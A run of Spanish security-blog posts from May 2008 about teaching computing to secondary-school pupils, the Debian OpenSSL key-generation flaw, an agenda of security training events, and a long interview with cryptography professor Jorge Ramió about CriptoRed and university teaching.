Recuerdo que cuando yo estudiaba, allá por los albores de Internet en España, quedaba con mis amigos para fotocopiar un artículo de una revista, un programa bajado de un ftp e impreso en el CPD o una descripción sobre un algoritmo que había sido fotocopiado tantas veces que ya había partes auténticamente negras. Sé que muchos de vosotros recordáis esos tiempos, dónde el objetivo era conseguir la información.

Hoy en día esto ha cambiado, y por tanto la labor del profesor. La mayoría de la información necesaria para aprender está al alcance de cualquiera en Internet. No, no pretendo montar un debate sobre el código abierto, el software libre o demás. Me refiero a la información necesaria para convertirse en un buen profesional.

Si quieres aprender a desarrollar sistemas operativos existen infinidad de manuales sobre cómo funciona un sistema operativo, artículos sobre cómo construir un sistema desde cero, cómo programarlo en C, tutoriales sobre Minix o Linux, ejemplos sobre el código de alguno de los sabores de UNIX e incluso el programa con el 80 % del código fuente del kernel de Windows XP a disposición de su estudio documentado y con los libros de Windows Internals.

Sí, siempre hay información que no está disponible o por la que hay que pagar, pero esa información queda lejos del entorno académico al que me refiero, al entorno de un profesor de Universidad, de curso privado o de instituto que quiere/tiene que enseñar algo a sus alumnos.

En esos entornos la labor del profesor no es la de “yo poséo la información y te la transmito”, porque seguro que todo el contenido de las asignaturas de una carrera universitaria pueden recopilarse en una tarde con Goo…. Digo… Windows Live y cabe todo en un pendrive de 4 Gb.

La labor del profesor debe ser la de motivar, la de acompañar al estudiante en el camino y la de facilitar la comprensión de los contenidos por parte de los estudiantes…. Y esta labor me encanta. Es por eso que cuando veo a algún ponente que habla bien, tengo que escucharle. Me maravilla oír como hablan otros ponentes y cuáles son sus mecanismos para mantener la atención de la audiencia. Podría citar a muchos porqué me gustan, pero necesitarían cada uno de ellos un post con cariño y dedicación, así que prefiero ir entrevistándolos.

De siempre quise ser profesor y hoy en día disfruto dando muchas clases en Universidades, Masters, formaciones privadas, conferencias o seminarios, pero también con los chavales en el Instituto.

Este año me saqué el CAP, lo tenía pendiente en mi lista de “tareas a realizar antes de los 25” pero como Earl, siempre hay tiempo para corregirse. Hice las prácticas y debía estar con ellos 10 horas lectivas. Ya tengo el título, pero sigo yendo a estar con ellos. Es una clase optativa de informática y estoy con un grupo de 15 chavales de los cuales uno o dos de ellos, a lo sumo, se inclinarán hacia estudios informáticos. Una chica quiere ser arqueóloga, otro quiere ser Policía, varios aún no lo saben y algunos van por letras. En su mayoría usan el correo electrónico, el messenger y poco más.

Allí es un lugar dónde la comprensión de la criptografía, el encapsulado de las VPNs o las GPOs quedan lejos. No obstante, yo procuro enseñarles cosas, como funciona el http, como se instala un ordenador (con Windows Vista por supuesto) o cómo es una tablet PC. El otro día les llevé un Vista, un Windows XP, un Windows Server 2008 virtualizado y un Windows Server 2003…ah.. sí, y mi Ubuntu.

Les llevé el Ubuntu y les hable de Multics, de Unix, de Minix, de Linux, de Tanenbaum, de Linus Torvalds, de Richard Stallman, del Software Libre, de las cuatro libertades, del Open Source y del sistema de licencias de Micro… Spectra. Sí, supongo que algunos diréis: “¡Qué les habrá dicho!” y otros pensarán “Mintiendo a jóvenes mentes para atraerlos al lado del mal”, algunos incluso pensaréis que yo les he vendido lo que he querido. Bueno, si no podéis dormir porque pensáis eso, mejor que mejor.

A muchos de mis alumnos tal vez no les servirá de mucha ayuda en su futuro, o tal vez sí, quién sabe, pero en la última clase escuchaban atentos la historia mientras se reían con las ventanas flan del Ubuntu o pintaban con un programa de dibujo en la Tablet PC. Se pasó la hora 10 minutos y no me avisaron, porque les gusta esa clase (según ellos), pero he de reconocer que yo me lo paso mejor y aprendo tanto como ellos.

Me gusta esto.

Saludos Malignos!

jueves, mayo 15, 2008

Juguetes para Debian

Uff, esto se está poniendo calentito!

Ya existen exploits por todas partes, hay exploits para los servicios SSH, pero claro, también hay para descifrar sesiones VPN-SSL o HTTP-s grabadas (¡Un plugin para Wireshark ya!) o para poder realizar ataques MITM en tiempo real (¿estarán añadiendo esta utilidad ya a Cain?) o para mil cosas.

Hablando con Luciano me comenta que la gente ha empezado a desparramar con la teoría de la conspiración (¿recordaís los bugs de Spectra que dejaba a drede para que el gobierno tomara el control?).

H.D. More ya tiene publicados un juguetitos especiales para Debian...y derivados.

OpenSSL PRNG Debian Toys
Este fallo lleva ya un buen tiempo, y, pese a disponerse del código fuente, ha pasado mucho tiempo sin descubrirse. La solución ha sido rápida, pero parece que no ha sido tan fina como debiera y están empezarse a darse situaciones complejas.

Esto huele a que el título que puso Luciano en su blog no va a ser tan descabellado.

Un buena fiesta. Suerte a los Debianitas que me imagino el curro que tenéis.

Saludos Malignos!

Agenda hasta Julio

Hola ami@s!

Os voy a dejar la agenda de actividades que vamos a tener de aquí hasta finales de Julio. Ya está casi todo el "pescado" vendido, así que habrá pocos cambios.

En Mayo, con flores y tallo

Lo que queda de Mayo tiene poco. Se acabarán los Hands On Lab en Pamplona hasta ya el mes de Octubre o Noviembre, en Madrid habrá un curso de Legalidad Informática del 26 al 30 de Mayo [Legaliz@IT] impartido por el gran Juan Luís Rambla y yo iré dos días a Salamanca [días 21 y 22 aunque ponga otra cosa en la web debido a unos cambios de última hora] a dar un curso de dos días de Seguridad Web. Para todos aquellos que guste la gestión, podrán disfrutar también de un Webcast impartido por Silverhack el día 20 de Mayo sobre System Center Operation Manager 2007.

En Junio, aguas mil...¿o no?

El plato fuerte lo tendremos en Junio. Primero con los Hands On Lab llegan a Barcelona, gracias al Escuela de Prevención y Seguridad Integral (allí irán Juan Luís Rambla, Silverhack, Julián Blázquez y Joshua Saenz) y continúan en Madrid, con el ProtégeIT! de Seguridad Web (la primera semana con Pedro Laguna y conmigo), Windows Server 2008, SharePoint Portal Server 2007 y Biztalk.

El día 5, participaremos en un evento gratuito sobre la Puesta en marcha del nuevo reglamento de la LODP, en Madrid organizado por Red Seguridad.

El día 9 comienza en Madrid la Formación Técnica en Auditoría y Seguridad Informática de 150 horas, repartidas en seis semanas temáticas de:
- Conceptos de Auditoría de seguridad
- Auditoría de seguridad de servidores y clientes
- Auditoría de Aplicaciones Web
- Auditoría y Seguridad de Red
- Auditoría Wireless, IM, VoIP y VPNs
- Análisis Forense
Durante esta formación, además de los profesores que estamos incialmente: Alex, Pedro Laguna, Juan Luís Rambla, Silverhack y yo, estarán algunas sorpresas como Anelkaos y su Wifislax en la parte de Wifi, el abuelo Parada de Spectra, Antonio Guzmán de la URJC y alguno más que ya os avanzaré.

Los días 11 y 12 en Madrid, estaremos, a todo despliegue en InfoSecurity. Ya os daré más información sobre este evento, pero allí estaremos David Cervigón, Juan Garrido "silverhack", El abuelo Parada, Joshua Saénz y impartiendo dos días de conferencias sobre tecnologías de seguriad en Spectra y habrá, en paralelo dos días de tacks de Hands On Lab gratuitos en los que estaremos nosotros, más Pedro Laguna, Rubén Alonso y alguno más. Ya os pondré la agenda y los horarios definitivos. Estas jorandas son gratuitas, pero hay que registrarse antes.

Las charlas:

- Ejemplos prácticos con Windows Vista y Windows Server 2008

- Protección perimetral y acceso seguro a internet basada en cortafuegos: Ejemplos con Microsoft ISA Server 2006

- Configuración de VPN para publicación segura de aplicaciones para acceso remoto. Casos prácticos con Microsoft Intelligent Application Gateway 2007

- Seguridad en servidores de Colaboración y Correo Electrónico. Ejemplos con Forefront Security for Exchange y SharePoint Server

- Seguridad Avanzada en el puesto de trabajo Windows. Configuración práctica de Forefront Cliente Security

Para acabar el mes, yo participaré en el Collecter 2008, que tendrá lugar en la EUI, cómo no, por allí en medio anda Jorge Ramió. Este congreso está esponsorizado por el IEEE Computer Society y tocará temas muy diversos sobre seguridad, nuevas tecnologías, etc... Los trabajos aceptados y que serán expuestos los tenéis en esta URL: Trabajos aceptados Collecter 2008

Julio et se finí....antes del Verano

Julio de momento será un mes tranquilo, salvo porque a principios de mes publicaremos el Reto Hacking VIII, y no me toque el ..., para que podáis jugar los niños que tenéis jornada de verano ... y los que no también. Además, los Hands On Lab llegan a Valencia, gracias a la Bolsa de Valencia, un año después y continuarán en Madrid con alguna novedad....

Y para los Rappeles, que sepan, que está confirmado, que el Asegur@IT III será el 25 de Septiembre en Bilbao, gracias la Universidad de Deusto. Txipi y yo hemos estado trabajando en la organización y lo publicaremos todo en breve.

Saludos Malignos!

Qué bello!

El gran Lucciano Bello, en su caida en picado hacia el lado del mal ha encontrado una vulnerabilidad en el paquetito OpenSSL que se mantiene en Debian [DSA-1571-1 Openssl], ese que se utiliza para la generación de las claves. Me encanta el título que ha puesto Luciano al post: cryptographic apocalypse.

El reveulo que se ha generado a nivel mundial ha sido de ordago, lo que demuestra que cuando un argentino se pone a tocar las bolas...., lo hace de verdad. ;)

He de decir que me siento doblemente feliz, en primer lugar porque me encanta que Luciano, que es un tipo genial, tenga el crédito de haberse currado este trabajo. Espero que ahora nos haga algún paper extenso sobre que ha pasado, cómo y porqué ha sucedido esto que yo con el código fuente no me apaño para entender bien estas cosas de poner mal escritas las palabras. (Ramió, please HELP!!!). En el blog de nuestro amigo, en el expediente de seguridad de Debian y, por supuesto, tampoco en la web del proyecto, que parece que está todo muy tranquilo..(desde noviembre del 2007), no hay ninguna explicación detallada del problema y su posible explotación (vale, sí, que las claves pueden ser predecibles). En segundo lugar estoy feliz, porqué....¿mmm que iba yo a decir?

El caso es que la cagada fue producida por un mantenedor de Debian, alguien que hace la misma labor que hace Luciano. A menudo hay petas entre los mantenedores y los desarrolladores del proyecto y muchas veces, bugs corregidos por los mantenedores no son reintegrados al proyecto original. Esto hace que la heterogenéidad de versiones crezca, que el mantenimiento se multiplique y que el trabajo de mantenimiento de una misma utilidad cada vez sea mayor, pues hay que empezar a mantener muchos proyectos similares que podrían ser el mismo. En este caso ha provocado una buena reacción en cadena. ¿Es esto una buena forma de crecer y avanzar? Si cuando haya que añadir una nueva función o haya que cambiar una nueva cosa hay que cambiarla en 10 paquetes OpenSSL que son muy similares, pero no iguales... al final, hay que repetir el desarrollo, hay que repetetir los tests y hay que repetir ...absolutamente todas las tareas.

¿Cuantas distribuciones hay basadas en Debian? ¿Cuantos se verán afectados por esto? De momento se ha publicado un método para comprobar y recrear claves vulnerables: Key Rollover.

Bueno Luciano, ahora, que tal cepillarse... no sé, ¿el FTP?. Mis respetos enhorabuena una vez más ¡guapetón!.

Saludos Malignos!

miércoles, mayo 14, 2008

¿Somos Humanos?

Hola amig@s "human@s"!

Últimamente empiezo a preguntarme si yo soy humano, pues fallo más que una escopeta de feria en todos los putos captchas, así que... quiero saber si lo sois vosotros. Para ello os dejo un par de comprobaciones que me han caido y que creo que son las más adecuadas para saber si vosotros, panda de seres, sois seres pensantes...

¡Qué yo ví una peli en la que tomaban el control de las personas con algo que le ponían en la base de la nuca y no vaya a ser que como no os puedo ver la nuca me la estéis jugando!

¿Eres Humano?

¿Seguro que eres humano?
Si aciertas las dos entonces NO eres humano.

Saludos Malignos!

No Lusers 44: UAC

***************************************************************************************
Publicado en Windows TI Magazine Mayo 2008
***************************************************************************************

***************************************************************************************
Publicado en Windows TI Magazine Mayo 2008
***************************************************************************************

martes, mayo 13, 2008

Punto extra para los Retos Hacking

Hola amigos!

Jorge, en la pregunta 20 de su entrevista plantea un juego, todo el que lo saqué antes del lunes tendrá un puntito extra para los Retos... sólo como aliciente para que os animéis. La solución la publicaré el domingo por la noche.

Saludos Malignos!

Entrevista a Jorge Ramió

Jorge Ramió es de esos profesores que toda universidad debería tener. Trabajador como el sólo, encantador en el trato y apasionado de su "vicio". El "little budda" de la criptografía está siempre pensando en organizar algo nuevo. Suele estar en el comité de varios congresos de seguridad al año, organizando el CIBSI, ayundando en el Collecter o en el RECSI, participa en la organización de las FIST y ha sido el impulsor del DISI. Gestiona Criptored y dirige siempre varios proyectos en la EUI de la Politécnica de Madrid (¡¡¡mi escuela!!!). Escribe artículos en revistas, mantiene el libro electrónico de Criptografía y Seguridad, colabora con la revista Red Seguridad y es imposible que haya alguna acción en seguridad en este país en la que no se cuente con él. ¡Y yo pensaba que aprovechaba mi tiempo!. Pero lo más sorprendente, es que consigue responder los mails en tiempo record... ¿cómo lo haces?

Saludos Malignos!

Little Budda
1.Yo siempre he pensado que hacía muchas cosas, pero cuando veo las que haces tú me acojono. Yo sé cual es mi droga, pero... ¿cuál es la tuya?

Hola. Ya veo por qué derroteros va a ir la entrevista y tengo por tanto dos opciones: presentarte una buena excusa y echarme a correr, o bien seguir tu línea... como te aprecio, haré esto último. Hombre, si vamos tirando de estereotipos alguien diría que la afición al trabajo está en mi vena catalana (aunque estoy seguro habrá miles de catalanes vagos) y que esto viene de familia (mis padres eran unos verdaderos currantes, de los de antes, sin vacaciones, ni spa, ni nada de estas modernidades por no decir otra palabra), pero creo que esa droga de la que hablas se resume en tener el placer de hacer cosas que a uno le gustan, lo que obviamente es una bendición. Y que es distinto a hacer lo que te dé la real gana... porque en ese caso quizás estaría en una playa del Caribe o en mi piso de Canet d’en Berenguer y en lo posible viviendo de las rentas, … si las tuviese claro. Y segundo, saber rodearse de buenos compañeros y mejores expertos. De esta forma, harás las cosas mejor o peor, eso ya es otro cantar, pero como estás haciendo lo que en realidad te gusta, pues es como aquello de que sarna con gusto no pica, y así vamos tirando de nuevos proyectos e ideas sin parar.

Es verdad, estoy metido en muchos proyectos, cursos, congresos y temas relacionados todos con la seguridad informática y mucho trabajo con países de Iberoamérica. Pero ojo, no por hacer más cosas salimos de pobres como se dice, que sigo siendo un simple funcionario español con uno de esos maravillosos sueldos con los que nos premia la administración pública, comparable con los de otros países europeos desarrollados.

2.Veo que estás hecho un chaval y ya no peinas canas, ¿es verdad que los calvos son más sexies para las mujeres?

¡Qué bueno! Lo de no peinar canas veo que va con segundas... en mi caso lo de las canas es ya un decir: para no peinarlas, que evidentemente estoy en edad de ello, no hay como raparse amigo. En casos similares y con una superficie capilar escasamente poblada, lo recomiendo: es comodísimo, nunca sales despeinado y no te puedes imaginar lo que me ahorro en peines. Con un número 52 que aparece implacable en mi DNI (mira tú por dónde, aún no tengo el eDNI, me hace ilusión, a ver cuándo lo pido) puedo decir que soy de esos rockeros viejos, de la generación de los Beatles, Rollings, Elton John, Dire Straits (tengo su walk of life en mi móvil), Queen, U2, Chicago, ABBA, Police, Credence, etc. Vamos, de aquellos grupos míticos que ahora desgraciadamente ya no salen... es que no tenemos más que triunfitos por todas partes. Y lo digo conociendo algo de qué va la música actual ya que mi hijo Jordi es deejay, y de los buenos. No digo que no me guste la música actual, que la oigo, pero es otra cosa, falta algo que los 70, 80 y 90 traían como una marca propia. Los tiempos cambian chaval, como en aquella canción.

Lo de ser más sexy o no, pues qué te voy a decir, ni idea. Pero al menos para mi mujer parece que sí y con eso te aseguro que voy más que sobrado. Ah, y muchos amigos (oh, los amigos) me dicen que así rapado represento menos años. Ya ves, ni botox, ni hilos dorados, ni leches, te rapas y hala, seis meses más joven... en fin, que tienes el aspecto del verano o semana santa anterior y no te has gastado un duro. Un verdadero chollo.

3.¿Podrías explicarnos en tres patás en que consiste "el cifrado de Paco"?

Debo reconocer que con esta pregunta me quedé inicialmente en blanco, era la pregunta típicamente críptica. Es verdad aquello de que la ciencia avanza que es una barbaridad, pero lo del “cifrado de Paco” no lo había escuchado hasta ahora. Tras hablar con el oráculo me entero, ahora caigo. Digamos que el tal cifrado del colega Francisco aún no ha visto la luz pero hay unos cuantos que hacen denodados empeños para que éste salga y sea el no va más. Me explico: más de alguna vez (por mi condición de coordinador de CriptoRed, no por otra cosa) he recibido correos de entusiastas de la cripto que dicen haber dado con un nuevo y fortísimo algoritmo de cifrado. Recuerdo el caso de un correo (no procedía de España, para que nadie se ponga a pensar) que me aseguraba haber dado con ese maravilloso algoritmo, que lo habían subido a su sitio Web y que tras varios meses nadie había sido capaz de romperlo. Así contado parece perfecto y genial; lo malo es que seguramente tampoco nadie había entrado a su sitio Web durante esos meses y de ahí procedía la supuesta invulnerabilidad del engendro. Esto de la criptografía lo manejan una centena de grandes científicos, matemáticos, informáticos, etc. y lo que ellos proponen tiene valor desde ese punto de partida y la comunidad científica lo analiza. Intentar cambiar las cosas desde fuera, e ir por libre como el amigo Paco, es en la práctica una quimera. Puedes hacerlo pero morirás en el intento (por muy bueno que sea tu algoritmo) y, lo que es más triste, no ganarás ni un duro porque la criptografía es así, si no es código abierto puedes apostar a que sea basura. Otra cosa es ser un experto en redes, en hacking , en forensia, que ya me gustaría, … y de eso tú sí que sabes Chema: hay un mercado de oportunidades y dinero esperando.

4. ¿Cuál es el objetivo de CriptoRed?

Básicamente compartir información, lo más parecido a una ONG y cuya la labor es muy agradecida especialmente por gente joven de países de Latinoamérica que no tiene suficientes recursos como para poder comprar libros y tienen, por contrapartida, unos inmensos deseos de aprender. El hecho de que se me haya ocurrido la idea en el año 1999 (tiene 9 años la niña, femenino por ser una red, que no la niña de Rajoy) y que la haya creado con un ámbito Iberoamericano no es una casualidad. Tengo mucha relación y raíces con América Latina ya que nada más nacer este servidor, sus padres emigraron desde Barcelona a Brasil, luego un par de años en Bolivia y finalmente en Chile, donde se crió, estudió y casó… esto me ha salido demasiado literato y doy fe que estoy sobrio.

La red pretende ser un repositorio de información valiosa sobre seguridad informática, generada por sus propios miembros y todo freeware, como debe ser: artículos, presentaciones, libros electrónicos, tesis, documentos multimedia, software de prácticas, etc.

Es un trabajo que lleva muchas horas al día y que se hace totalmente ad-honorem pero que te da grandes satisfacciones al ver que tanta gente está aprendiendo con documentos que les ofreces y que de otra manera sería casi imposible que llegaran a sus manos. Hablamos de más de 25.000 documentos descargados cada mes, no está mal.
Además de esta faceta, la red temática organiza CIBSI, el Congreso Iberoamericano de Seguridad de Informática con una periodicidad bienal en los años impares y con un alto nivel científico, en tanto los trabajos presentados son evaluados por un comité de 45 doctores de 13 países. Hemos celebrado ya dos en México, uno en Chile, el último en Argentina (donde por cierto participó con gran éxito un tal Chema Alonso) y el próximo será el 2009 en Montevideo, Uruguay, teniendo nada menos que la famosa torre ANTEL como sede. Espero verte por esas tierras.

5. ¿Cómo te embarcaste en el proyecto del Día Internacional de la Seguridad de la Información? ¿Quién vendrá este año?

Después de esos casi 10 años con CriptoRed, pensé que era hora de arrancar con un nuevo proyecto, más o menos paralelo a esa red, y que me diera una mayor libertad de movimiento y de acciones a desarrollar al tener un presupuesto para ello. Como no había ninguna cátedra universidad empresa en España directamente relacionada con la seguridad, presenté el proyecto junto a mi amigo Manuel Ballester a diversas empresas, siendo Applus+ quien apostó finalmente por la idea y creo que no se equivocaron dada la publicidad que hemos logrado en tan sólo dos añitos.

Comenté luego el proyecto a Justo Carracedo, otro amigo y director de la EUITT de la UPM para que la cátedra fuese de esa escuela, que no es en la que yo estoy trabajando pero que está en el mismo campus, tuve todo su apoyo y en tres meses comenzamos las actividades de la Cátedra UPM Applus+ de Seguridad y Desarrollo de la Sociedad de la Información CAPSDESI, la primera y de momento única en España en este ámbito.

Como te decía, en dos años de vida estamos en el top ten de las búsquedas en Google por cátedra UPM así como por DISI 2006 y DISI 2007. Acabamos de renovar el convenio de cátedra con Applus+.

Como una de las actividades propias de una cátedra planteamos celebrar de forma institucional en la UPM el CSD, Computer Security Day, idea original de la ACM y que en nuestro país se organizaba a través de ISSA Spain pero no con estas características. El evento con asistencia totalmente gratuita, cuenta cada año con destacados expertos tanto nacionales (sin ir más lejos, tú has estado en el primero) como internacionales, en este caso con invitados de la talla de Martin Hellman, Hugo Scolnik y Jeimy Cano, por indicar sólo tres nombres.

En cuanto a DISI 2008, lo siento pero aún no puedo confirmar nombres. Lo que es cierto es que tras la venida de Hellman en el 2007 no es fácil mantener el listón a ese nivel, pero haremos todos los esfuerzos posibles para tener un excelente DISI 2008.

6. ¿Cuál es tu comida chilena preferida?

¡Buena pregunta! He de decirte que soy un afortunado al estar felizmente casado con mi mujer Ana María (llevamos nada menos que 30 años… eso es de premio o al menos debería poder desgravarse, se lo pediré a Zapatero) que es chilena y además de gran trabajadora y profesional, es una excelente cocinera, tanto de la comida chilena como de la española. Dicho esto, no me va a quedar otra solución que invitarte a comer algún día a mi casa para que te lo creas.

Una de las cosas que más gusta a quienes no conocen la comida de allí son las empanadas chilenas, tanto las de carne como las de queso, aunque estas últimas son de más de aperitivo; también la cazuela, una especie de cocido madrileño pero mucho más Light; y por último las humitas, una pasta que se hace con maíz y que allí se llama choclo. En estos exquisitos platos y otros más de la cocina chilena y española (paella, fideuá, caldo gallego, cocido madrileño…) mi mujer es una especialista y yo, como corresponde, un agradecido gourmet.

Otra cosa muy típica en Chile, aunque también lo es de Perú y entre ambos países se pelean su paternidad desde tiempos remotos, es el ceviche (pescado crudo cocinado con limón) y el pisco sour, un aperitivo hecho con pisco (una especie de aguardiente más refinado) y limón. Con esto último ya te veo golpeando mi puerta, pidiendo desesperado tu cuota de licor.

7.Cuando das clase en la universidad recomiendas libros a los chavales. Recomiéndanos tres libros a nosotros sobre seguridad y/o informática.

¿Sólo tres? Bueno, primero uno para abrir los ojos y saber en qué mundo vivimos en cuanto a la criptografía y la seguridad: el libro Cripto de Steven Levy. Se trata de una especie de novela con datos técnicos y que nos cuenta las batallas que tuvieron que librar los informáticos, matemáticos y criptólogos en los años setenta y ochenta ante por ejemplo la todopoderosa NSA.

Otro libro, también en plan divulgación y muy entretenido, Los Códigos Secretos de Simon Singh.

Por último, y ahora ya en una faceta técnica, aunque hay una oferta muy amplia en estos momentos yo me decanto por dos y en este caso en inglés: Cryptography and Network Security. Principles and Practice de William Stallings y Handbook of Applied Cryptography de Alfred Menezes, quien por cierto asistió como conferenciante invitado al segundo congreso CIBSI en México DF, un tío genial.

8. ¿Cuantos "enfermos" tienes catalogados en CriptoRed?

Muy bueno. El primero, y aunque el burro debería ir siempre detrás, soy yo. En este caso porque estoy permanentemente preocupado que el servidor esté activo. Aquí tengo una ayuda inestimable (también ad-honorem) de parte mi gran amigo y compañero Daniel Calzada, un experto en seguridad de redes como la copa de un pino y excelente profesor y orador, y que mantiene a raya al servidor de la red. Es lo que te decía al comienzo de esta entrevista, tener gente que trabaje contigo que sean buenos profesionales y amigos es un lujo que pocos podemos darnos.

En cuanto a otros enfermos como dices, en realidad no los he seguido pero me imagino que hay muchos amigos tanto de España como de Latinoamérica que esperan los primeros días de cada mes para ver qué nuevos documentos subimos en el resumen de actividades de la red, cuáles son los nuevos CFP, etc. Volvemos a lo del comienzo, me repito como el ajo; aquí cuento con la inestimable ayuda de otros amigos como son los “chavales de Hispasec” de la mano de Bernardo Quintero y muchos más -no los nombraré a todos para no dejarme ninguno en el tintero y quedar mal- que dan difusión de este resumen a través de su excelente servicio de una-al-día.

9. ¿Debería o no existir un colegio de Ingenieros Informáticos? Ale, para que te entretengas.

Por una parte, qué te voy a decir, y por la otra qué quieres que te diga. Está claro que la profesión de ingeniero informático está como está por este problema. Es más que necesario tener un colegio, ya no tanto por el intrusismo en la profesión, que lo hay, sino por conocer bien cuáles son las atribuciones del ingeniero informático. Lo que sucede es que se trata de una titulación todavía demasiado joven y no se han creado aún generaciones de ingenieros como sucede en otras ingenierías o en arquitectura. Sin ir más lejos, yo no soy informático sino teleco, y un buen número de profesores en informática que son más o menos cincuentones (todo hay que decirlo) no son informáticos por razones obvias. Lo ideal sería lo contrario qué duda cabe y hacia eso se va, pero es un proceso lento y tendremos que esperar todavía algunos años para que haya el lógico relevo generacional… en otras palabras, que nos jubilen a unos cuantos.

10. Venga, ¿a cuantos cateas cada año?

No tanto, no tanto. Al ser una asignatura optativa de tercer curso, no tiene sentido ser más papista que el Papa. Es cierto que el temario es denso y que hay muchos conceptos a veces difíciles de entender como las diferencias entre clave pública y privada, aunque que cuando lo han entendido se dan cuenta que es una chorrada, pero al final el nivel de aprobados está siempre en torno al 70% en junio, y si contamos la convocatoria de septiembre se llega fácilmente al 80%, un valor bastante alto para lo que se supone normal. La idea es que si estudias lo justo, haces las prácticas (no las copias a tu colega) y asistes a clases, el aprobado está garantizado. Y ojo, que en la evaluación siempre ajusto la famosa curva de Gauss de forma que siempre haya alguien en torno al 9 o similar. He puesto más de algún 10 y también matrículas, y tan contento. Me gusta ayudar y subir la nota al que se lo curra y ya no tanto al pasota.

Ya que hablo de asistir a clases, esto parece más difícil. Es un mal que aqueja a casi toda la universidad. En general, la gente pasa de ir a clase y ya a la tercera semana tienes en el aula al 25% o menos de los alumnos matriculados… no sé, tal vez habrá que mostrarles al comienzo de la clase un nuevo vídeo de Shakira o del Bisbi, o mejor aún rifar un Mini cada mes, que ahora está de moda. Algo habrá que hacer, seguramente mejorar nosotros mismos, los profesores. Lo cierto es que esa actitud que veías en muchos alumnos hace 10 años de interés y de ganas de comerse el mundo, hoy en día resulta casi anecdótico. Algo pasa y es digno de un estudio más profundo.

11. ¿Estás listo para Bolonia?

Mire usted, aunque no soy gallego le voy a decir que sí y que no. Lo de Bolonia bajo el punto de vista del profesor significa adoptar una nueva actitud ante el alumno, pensar en otra forma de entender la docencia, huir un poco de la típica clase magistral, orientar el aprendizaje enfocado a que es el alumno quien aprende y no tanto el profesor quien le enseña, emplear nuevas tecnologías y metodologías, etc. Todo esto suena muy bonito, muy idílico, y en algunos casos puedo decirte que algunos profesores lo estamos probando, pero creo que nos falta mucho para llegar a ese objetivo y que, de una u otra manera, estamos dando palos de ciego, con todos mis respetos a este colectivo.

Un aspecto positivo que traerá esto de Bolonia es la reforma de los planes de estudio, algo muy necesario porque hacía más de 15 años (al menos en mi Escuela y creo que el conjunto de España estará casi igual o peor) que no se actualizaban y en informática 15 años es una barbaridad. Por ejemplo, en España salvo en la Universidad Carlos III y en la de Deusto, toda la oferta de asignaturas relacionadas con la seguridad informática son optativas o de libre elección. Esto podría ser válido para comienzos de los 90 (cuando comencé mi andadura con la asignatura) pero hoy es una verdadera aberración tecnológica que no sea una asignatura troncal o al menos obligatoria; no creo que haya que convencer a nadie sobre esto y me da lo mismo que se piense en la seguridad como gestión de sistemas o como implementación y administración de redes, el mercado está ahí esperando.

Y dentro de este positivismo está el hecho de que en varias titulaciones nuevas como Graduado en Ingeniería de Computadores o en Ingeniería del Software, ya no se discute que Fundamentos de la Seguridad es una materia obligatoria, y le siguen otras 3 ó 4 optativas en esa línea. Aunque aún no canto victoria porque sigue habiendo gente que opina la necesidad de seguir con asignaturas de Bases de Datos 1, 2, 3 y avanzadas, lo mismo en Ingeniería del Software y en esos términos, digo que ya era hora que nos tomaran en cuenta.

12. ¿Qué debe saber un chaval que quiera entrar a estudiar Informática o Telecomunicaciones antes de poner un pie en la universidad?

En realidad no se les pide nada en especial. Lo que sí les puedo recomendar (si se acepta una recomendación de quien lleva más de 30 años en este ajo) es que desde el primer día en la universidad cambien el chip. Te puedes divertir, faltaba más porque sino te conviertes en un tonto grave, pero a la universidad se va a estudiar y es “tu trabajo” de al menos 8 horas diarias, sábados y domingos incluidos. Si no lo toman así, difícilmente sacarán la carrera y mucho menos en los años que están estipulados. Ya te puedes olvidar de los botellones sistemáticos, y de las salidas jueves, viernes y sábados. Una de vez en cuando y punto.

Alguien con mucha marcha te puede decir que ese tipo de vida ni muerto. Vale, muy bien, es tal vez una de las etapas que más gratamente se recuerda en la vida, tus batallitas y triunfos con la peña, las chicas, los chicos, etc., pero salvo que seas un portento y con un CI altísimo no sacarás la carrera. Como se dice, son lentejas y tú decides, que para eso ya son mayorcitos cuando entran en la universidad para pensar en qué quieren ser dentro de unos años más. Me he puesto muy paternalista, ¿verdad?

13. ¿Y el secreto del éxito para que salga en tiempo y forma de la universidad?

A eso vamos. Primero que nada asistir a clases, y no digo a esta sí y a esta no. A todas te guste más o menos el profesor o profesora, que de todo hay claro. Y un estudio sistemático, diario, planificación casi militar de tus estudios. Rodearte de buenos compañeros y colegas; es decir gente enrollada y normal pero que también sepa ponerse el mono de trabajo y que veas que con esa persona también vas a aprender y tú estar a la altura de él o ella.

Otro tema son las famosas tutorías. Durante el curso no va ni Dios, pero sí todos cuando están atragantados con la práctica de turno o cuando queda una semana para el examen. Eso no sirve para nada, salvo para que el profesor o la profesora te aclaren algunas dudas, pero eso no te asegura superar el examen. Aunque crea que puede quedar por un pelmazo, es conveniente dejarse ver de vez en cuando durante el curso en el despacho del profesor para preguntar cosas vistas en clases anteriores. Eso demuestra interés y de alguna forma se toma en cuenta; no te voy a decir que por ir 10 veces durante el curso te vayan a subir un punto (supongo que Bolonia no lo contempla…) pero sí que puede ser importante.

A muchos que van de buen rollito a la universidad y pasan más en la cafetería que en las aulas, les diría que se pagaran ellos sus estudios trabajando y no papá y mamá. A ver si les haría gracia. Además, es bueno recordar que en España la universidad es en su gran mayoría pública y muy pero muy económica, mucho menos que cualquier colegio subvencionado y ya no te digo particular. El hecho de que vayas de vago, significa que le estás quitando la oportunidad otra persona seguramente con menores recursos económicos y que posiblemente aprovecharía mejor esta oportunidad que todos pagamos con nuestros impuestos.

14. De todo el mundo que has conocido en tu trabajo, ¿Quién te ha impresionado más y por qué?

Siguiendo con lo que te comentaba en la pregunta anterior, en países como Bolivia me he encontrado con chavales que tienen unas ganas de aprender a toda prueba, increíble. Y te das cuenta que en ciertos casos no cuentan ni con dinero para pagarse el autobús pero se comen los libros; los países desarrollados como el nuestro deberíamos aprender de esta gente y su deseo de superación.

En cuanto a personajes de la seguridad informática que he tenido la suerte de conocer, son muchos pero me quedaría con Martin Hellman y Alfred Menezes, dos pesos pesados y grandes genios a nivel mundial y que, como sucede siempre, son personas tremendamente humildes.

15. ¿Qué proyectos estás dirigiendo hoy en día en la universidad?

Aunque soy miembro del grupo de investigación T>SIC de la UPM y participo en algún proyecto con otra universidad, en realidad mi labor en este sentido se ha centrado siempre en la innovación tecnológica y educativa, la i pequeña de la famosa I+D+i. Y he de confesarte que me siento muy contento en esta faceta, si bien entiendo que muchos prefieran la I+D por ser “de mayor nivel” y dar más prestigio… aunque aquí podríamos tirar chorros de tinta por lo que será mejor correr un tupido velo.

